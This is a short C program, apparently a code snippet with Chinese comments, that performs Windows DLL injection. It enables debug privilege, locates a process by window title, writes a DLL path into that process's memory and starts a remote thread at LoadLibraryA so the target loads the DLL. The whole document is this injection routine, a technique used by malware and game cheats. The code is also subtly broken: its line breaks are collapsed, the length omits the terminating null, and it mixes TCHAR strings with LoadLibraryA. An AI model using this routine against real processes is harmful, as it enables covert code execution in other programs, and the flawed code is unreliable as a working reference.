CreateRemoteThread

#include <windows.h>#include <tchar.h>#include <stdio.h>bool Start(TCHAR* buff,DWORD pid);BOOL EnablePrivilege(LPCTSTR lpszPrivilegeName, BOOL bEnable);int main (void){EnablePrivilege(SE_DEBUG_NAME,TRUE);//获取本进程权限DWORD lpdword,pid;TCHAR strbuff[100]={0};memcpy(strbuff,TEXT("D:\\个人资料\\桌面\\WKS\\dll.dll"),100);HWND hwnd=FindWindow(NULL,TEXT("ok"));if (hwnd){lpdword=GetWindowThreadProcessId(hwnd,&pid);}else{printf("没有找到句柄\n");return 0;}Start(strbuff,pid);return 0;}bool Start(TCHAR* buff,DWORD pid){HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,pid);//打开进程if (hProcess){int len=_tcslen(buff);LPVOID pAddr=VirtualAllocEx(hProcess,NULL,len,MEM_COMMIT, PAGE_READWRITE);  //在远程进程申请内存空间if (pAddr){if (WriteProcessMemory(hProcess,pAddr,buff,len,NULL)) //写dll路径到目标进程{PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA"); //获取函数地址if (pfnStartAddr){DWORD lpdword;HANDLE rThread;rThread=CreateRemoteThread(hProcess,NULL,NULL,pfnStartAddr,pAddr,0,&lpdword);if (rThread)printf("远程线程执行成功!");CloseHandle(rThread);}}}CloseHandle(hProcess);}return true;}BOOL EnablePrivilege(LPCTSTR lpszPrivilegeName, BOOL bEnable){HANDLE hToken = NULL;TOKEN_PRIVILEGES tp;LUID luid;if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY | TOKEN_READ, &hToken))return FALSE;if(!LookupPrivilegeValue(NULL, lpszPrivilegeName, &luid))return TRUE;tp.PrivilegeCount = 1;tp.Privileges[0].Luid = luid;tp.Privileges[0].Attributes = (bEnable) ? SE_PRIVILEGE_ENABLED : 0;AdjustTokenPrivileges(hToken, FALSE, &tp, NULL, NULL, NULL);CloseHandle(hToken);return (GetLastError() == ERROR_SUCCESS);}